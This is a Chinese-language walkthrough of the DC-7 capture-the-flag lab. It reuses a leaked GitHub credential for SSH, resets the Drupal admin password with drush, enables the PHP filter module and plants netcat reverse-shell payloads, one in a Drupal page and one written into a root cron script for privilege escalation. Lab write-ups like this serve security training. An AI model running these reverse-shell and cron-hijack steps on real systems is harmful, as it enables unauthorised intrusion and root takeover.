DC7靶机渗透测试
文章目錄
- 環境版本:
- 一、信息收集
- 1.主機發現
- 2.端口掃描
- 二、漏洞掃描/利用
- 1.訪問靶機 web 服務
- 2.信息收集
- 3.ssh 連接
- 4.查看文件權限
- 5.查看文件內容
- 7.利用框架漏洞
- 8.安裝 PHP 插件
- 10.漏洞利用
- 總結:
環境版本:
- VMware pro 16
- Kali 2021.1(虛擬機)
- DC-7(虛擬機)
一、信息收集
1.主機發現
arp-scan -l
發現靶機 ip:192.168.1.126
2.端口掃描
發現其開放了 22 ssh、80 web drupal
二、漏洞掃描/利用
1.訪問靶機 web 服務
DC-7介紹了一些“新”概念,但我將讓您了解它們是什么。:-)
雖然這個挑戰并不是所有的技術性的,如果你需要訴諸暴力或字典攻擊,你可能不會成功。
你要做的是“外面”去想。
在盒子外面。:-)
得到提示,技術難度相對簡單,類似解謎
發現末尾有留下名字/昵稱
2.信息收集
搜索 DC7USER 發現其在 github 上有項目
<?php$servername = "localhost";$username = "dc7user";$password = "MdR3xOgB7#dW";$dbname = "Staff";$conn = mysqli_connect($servername, $username, $password, $dbname);
?>
在 config.php 發現 mysql 數據庫連接 PHP 腳本,但是端口掃描時沒有發現 mysql 開放端口,嘗試將其賬號密碼進行 ssh 連接
3.ssh 連接
ssh dc7user@192.168.1.126
MdR3xOgB7#dW
登陸成功,發現提示你有一個新郵件
查看郵件內容:
cd /var/mail
dc7user@dc-7:/var/mail$ cat dc7user
From root@dc-7 Fri Apr 09 18:00:09 2021
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 09 Apr 2021 18:00:09 +1000
Received: from root by dc-7 with local (Exim 4.89)(envelope-from <root@dc-7>)id 1lUm3l-0000I3-E6for root@dc-7; Fri, 09 Apr 2021 18:00:09 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1lUm3l-0000I3-E6@dc-7>
Date: Fri, 09 Apr 2021 18:00:09 +1000rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql [success]From root@dc-7 Fri Apr 09 18:15:06 2021
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 09 Apr 2021 18:15:06 +1000
Received: from root by dc-7 with local (Exim 4.89)(envelope-from <root@dc-7>)id 1lUmIE-0000J5-1Yfor root@dc-7; Fri, 09 Apr 2021 18:15:06 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1lUmIE-0000J5-1Y@dc-7>
Date: Fri, 09 Apr 2021 18:15:06 +1000Database dump saved to /home/dc7user/backups/website.sql [success]dc7user@dc-7:/var/mail$
發現是以 root 權限執行的計劃任務:每15分鐘執行一次 /opt/scripts/backups.sh
若是對該文件有寫權限,則可以直接提權
4.查看文件權限
ls -l /opt/scripts/backups.sh
發現莫得權限,root、www-data 的權限都是 7,當前用戶只有 rx 權限,結合開放的 80 端口嘗試使用其進行彈 shell
5.查看文件內容
cat /opt/scripts/backups.sh
發現 drush,命令,嘗試使用其更改 drupal 默認用戶 admin 密碼
cd /var/www/html/sites/default
drush user-password admin --password="passwd" #將admin用戶密碼更改為passwd
更改成功,登入后臺嘗試使用 PHP 代碼執行 nc 連接
7.利用框架漏洞
進入后臺 -> content -> add content -> basic page
查看文件類型,發現無法保存為 PHP,應該是沒加載或安裝 PHP,查看發現沒有安裝
8.安裝 PHP 插件
在后臺添加模塊 PHP
進入后將如下鏈接填入,點擊 install 下載
https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
完成后啟用該模塊,點擊 enable nwely added modules 進入新頁面,找到 PHP filter 勾選,滑到最后點擊 install
成功加載
9.使用 PHP 模塊進行 nc 連接
1)攻擊機監聽
nc -lvvp 1234
2)靶機 nc 彈shell
在 content -> addcontent -> basic page 中構造 shell php 頁面
<?php system("nc -e /bin/sh 192.168.1.123 1234"); ?>
點擊 preview 預覽即可執行 nc 連接
得到 shell:
10.漏洞利用
1)攻擊機 nc 監聽
nc -lvvp 9999
2)更改計劃執行任務內容
cd /opt/scripts
echo "nc -e /bin/sh 192.168.1.123 9999" >backups.sh
cat backups.sh
因為 15 分鐘執行一次,等待 15 分鐘
若是咱們自己手動執行則會以手動執行的權限彈 shell
11.查看計劃任務間隔
發現其為每 15 分鐘執行一次
總結:
- 結合了社工
- 框架漏洞/利用相當危險
- 計劃任務權限要謹慎對待
總結
